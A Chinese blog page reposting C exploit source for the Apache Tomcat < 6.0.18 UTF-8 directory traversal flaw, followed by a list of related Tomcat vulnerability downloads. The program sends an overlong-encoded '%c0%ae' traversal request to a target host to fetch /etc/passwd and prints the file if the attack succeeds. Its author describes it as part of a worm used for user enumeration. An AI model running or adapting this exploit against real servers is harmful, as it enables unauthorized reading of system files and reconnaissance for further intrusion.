`

Apache Tomcat UTF8目录遍历漏洞测试代码

阅读更多

 

 

/*Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploit
c0d3r: mywisdom
thanks for not being lame to change exploit author
tis is one of my linux w0rm module for user enumerations, i've dual os worm
thanks to: gunslinger,flyf666,petimati,kiddies,xtr0nic,c0mrade,n0te,v3n0m,iblis muda,cr4wl3r
thanks to: isa m said, whitecyber
thanks to all devilzc0de crews and members, all jasakom crews and members
greetz to inj3ct0r crews:
31337 Inj3ct0r Members:
cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka,
Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r?, etc..
not so good but worth to try if our target directory structure has /usr/local/wwwroot
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#define EXPLOIT "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.0\n\n"
#define RCVBUFSIZE 9999 
#define tester "root:x"    
void cls()
{
char esc = 27;
printf("%c%s",esc,"[2J");
printf("%c%s",esc,"[1;1H");
}
int main(int argc,char **argv)
{
if(argc<2)
  {
/**checking argument to avoid memory wasting for useless variables in vma**/
   cls();
   printf("\nApache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploit\n");
   printf("\nc0d3r: mywisdom\n");    
   printf("\nusage:./tomcatevil hotname\n");
   exit(1);
  }
else
{
int port=80;
char echobuf[RCVBUFSIZE];
int rval,sockfd, bytesrcv, totalbytes;
struct hostent *he;
struct sockaddr_in their_addr;
if((he=gethostbyname(argv[1])) == NULL)
  {
   perror("\nSorry please recheck your target hostname !\n");
   exit(1);
  }
  else
  {
   if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
     perror("socket()");
     exit(1);
    }
    else
    {
  their_addr.sin_family = AF_INET;
printf("\n[-]Checking whether port %d opens or not\n",port);
their_addr.sin_port = htons(port);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);
if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
  {
  perror("failed to connect !!!");
  }
else
{
printf("\n[+]Port 80 opens !!! now sending your exploit to our target\n");
if(send(sockfd, EXPLOIT,999,0)==-1)
   {
perror ("send");
   }
else
   {
       totalbytes=0;
       while (totalbytes < RCVBUFSIZE)
        {
        if ((bytesrcv = recv(sockfd, echobuf, RCVBUFSIZE - 1, 0)) <= 0)
            {
            }
            else
            { 
              totalbytes += bytesrcv;
              echobuf[bytesrcv] = '\0';
            }
           totalbytes++;
        }
   }
   if(echobuf)
       {
        rval=strstr (echobuf, tester);
          if(rval)
             {
            printf(echobuf);
            printf("\n[+]w00t!!! target vulnerable! exploitation success u may see /etc/passwd above !!!\n");
            exit(1);
             }
             else
            {
            printf(echobuf);
            printf("\n[-]target not vulnerable !!!\n");
            exit(1);
            }
       }
}
close(sockfd);
    }
   }
}
}

 

分享到:
评论

相关推荐

    apache Tomcat 漏洞

    ### Apache Tomcat 漏洞详解 #### 一、漏洞概述 Apache Tomcat是一款开源的Servlet容器,由Apache软件基金会负责维护,它实现了对Servlet和JavaServer Pages (JSP)技术的支持,是Java Web开发中常用的服务器之一。...

    Tomcat-8.5.28 无漏洞

    描述中提到的"Apache_Tomcat存在安全限制绕过的漏洞预警"警示我们,Apache Tomcat之前可能存在的一个严重问题,即安全限制绕过漏洞。这种类型的漏洞允许攻击者避开服务器的安全控制,从而可能导致未经授权的访问、...

    Apache Tomcat 最新源代码

    Apache Tomcat 最新源代码Apache Tomcat 最新源代码Apache Tomcat 最新源代码Apache Tomcat 最新源代码Apache Tomcat 最新源代码Apache Tomcat 最新源代码Apache Tomcat 最新源代码Apache Tomcat 最新源代码Apache ...

    Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)

    此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意系统命令,获取敏感信息,甚至完全控制服务器。 ### 漏洞原理 文件包含漏洞通常发生在Web应用处理用户输入时,没有...

    Apache Tomcat CVE-2019-0232 远程代码执行漏洞 - tdcoming'blog QQ group 90

    为了复现此漏洞,攻击者需要创建一个测试环境,包含一个易受攻击的Tomcat版本(如上述受影响的版本)和Java 8u121。然后,需要编辑Tomcat的配置文件`web.xml`和`content.xml`,启用CGI Servlet,并设置相应的参数。...

    apache-tomcat-8.5.51.tar.gz(官方宣布最新无漏洞版本)

    2020 年 2 月 4 日,Apache Tomcat 官方发布了新的版本,该版本修复了一 个影响所有版本(7.*、8.*、9.*)的文件包含漏洞,但官方暂未发布安全公告 2020 年 2 月 20 日,CNVD 发布了漏洞公告,对应漏洞编号:CNVD-...

    信息安全技术:目录遍历漏洞防御.pptx

    目录遍历漏洞是网络安全领域的一个重要问题,它允许攻击者通过构造特定的URL,绕过正常的访问控制,访问到服务器上的非预期目录,甚至包括敏感文件。这种漏洞通常发生在Web应用程序中,当系统未能正确验证和处理用户...

    网站目录遍历软件

    网站目录遍历是一种网络安全技术,主要用于测试和评估网站的安全性。这种软件工具允许用户通过自动化的方式扫描和遍历目标网站的各个目录,以查找可能存在的公开或未授权访问的资源。这种活动在合法的安全审计中被...

    Apache Flink目录遍历(CVE-2020-17519)批量检测脚本

    2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞,漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的...

    apache-tomcat-7.0.108(UTF8).zip

    这个名为"apache-tomcat-7.0.108(UTF8).zip"的压缩包包含了Apache Tomcat 7.0.108版本,这是一个支持UTF-8编码的版本,因此在处理多语言内容时能提供更好的支持。 Tomcat 7是Apache Tomcat服务器的一个重要版本,它...

    Apache Flink目录遍历(CVE-2020-17519)单目标检测工具

    2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞,漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的...

    apache tomcat使用技巧

    Apache Tomcat 使用技巧 Apache Tomcat 是一个流行的开源 Web 服务器软件,广泛应用于 Web 应用程序的开发和部署中。使用 Apache Tomcat 能够帮助开发者快速搭建和部署 Web 应用程序,但新手可能不知道如何正确使用...

    apache tomcat-5.5.23 这个版本很难找到了

    1. **安全性**:5.5.23版本包含了对安全漏洞的修复,这包括对跨站脚本(XSS)攻击、跨站请求伪造(CSRF)和目录遍历等常见威胁的防护。然而,由于这是旧版本,可能存在未被发现的漏洞,因此不建议在生产环境中使用。 2....

    Apache tomcat远程代码执行验证代码

    4. **安全性配置**:Apache Tomcat的安全配置非常重要,应限制对特定目录的访问,关闭不必要的服务,以及正确配置角色和权限,以防止RCE漏洞的发生。 5. **漏洞利用**:攻击者可能通过修改PUT请求中的JSP代码,插入...

    apache-tomcat-10.0.8.zip

    apache-tomcat-10.0.8.exe、 apache-tomcat-10.0.8.tar.gz、 apache-tomcat-10.0.8.zip、 apache-tomcat-10.0.8-windows-x64.zip、 apache-tomcat-10.0.8-windows-x86.zip、 apache-tomcat-10.0.8-deployer.tar.gz、...

    tomcat 启动报APR based Apache Tomcat Native library not found

    标题 "tomcat 启动报APR based Apache Tomcat Native library not found" 指出的问题是关于Apache Tomcat服务器在启动时找不到基于APR(Apache Portable Runtime)的本机库。这通常涉及到Tomcat使用APR库来提高性能...

    开发工具 apache-tomcat-8.0.41-windows-x86

    开发工具 apache-tomcat-8.0.41-windows-x86开发工具 apache-tomcat-8.0.41-windows-x86开发工具 apache-tomcat-8.0.41-windows-x86开发工具 apache-tomcat-8.0.41-windows-x86开发工具 apache-tomcat-8.0.41-...

    Apache Tomcat6.0.32 API 参考手册

    Apache Tomcat6.0.32 API 参考手册,从官方源代码包中的javadoc中提取。

Global site tag (gtag.js) - Google Analytics